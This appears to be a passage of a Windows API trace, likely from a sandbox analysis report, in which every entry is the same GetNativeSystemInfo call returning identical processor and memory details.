	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.598] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.599] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.600] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.601] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
